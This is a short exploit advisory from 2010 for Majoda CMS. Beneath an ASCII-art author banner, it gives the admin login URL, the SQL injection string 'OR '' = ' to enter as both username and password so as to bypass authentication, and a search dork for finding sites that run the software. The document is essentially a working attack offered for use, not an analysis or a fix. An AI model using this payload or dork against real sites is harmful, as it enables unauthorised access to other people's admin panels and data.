Majoda CMS suffers from a remote SQL injection vulnerability that allows for authentication bypass.
842355f229fafc6f60a690b830b840d97e32af6c78cc952c65dad6298a7379aa
# Exploit Title: Majoda CMS (Auth Bypass) SQL Injection Vulnerability
# Date: 2010-02-28
# Author: Phenom
# Software Link:
# Version:
# Tested on: windows xp sp3
# CVE :
# Code :
------------------------------------------------------
------------------------------------------------------
_____ _
| __ \| |
| |__) | |__ ___ _ __ ___ _ __ ___
| ___/| '_ \ / _ \ '_ \ / _/\| '_ ` _ \
| | | | | | __/ | | | (_) | | | | | |
|_| |_| |_|\___|_| |_|\/__/|_| |_| |_|
------------------------------------------------------
------------------------------------------------------
############### Majoda CMS (Auth Bypass) SQL Injection Vulnerability ##########################
#
# Author : Phenom
#
# mail : sys.phenom.sys[at]gmail[dot]com
#
# Dork : Majoda CMS
#
################################################################################################
####### Exploit ################################################################################
#
# http://site/admin/index.asp
#
# Användarnamn(Username) : 'OR '' = '
# Lösenord(password) : 'OR '' = '
#
################################################################################################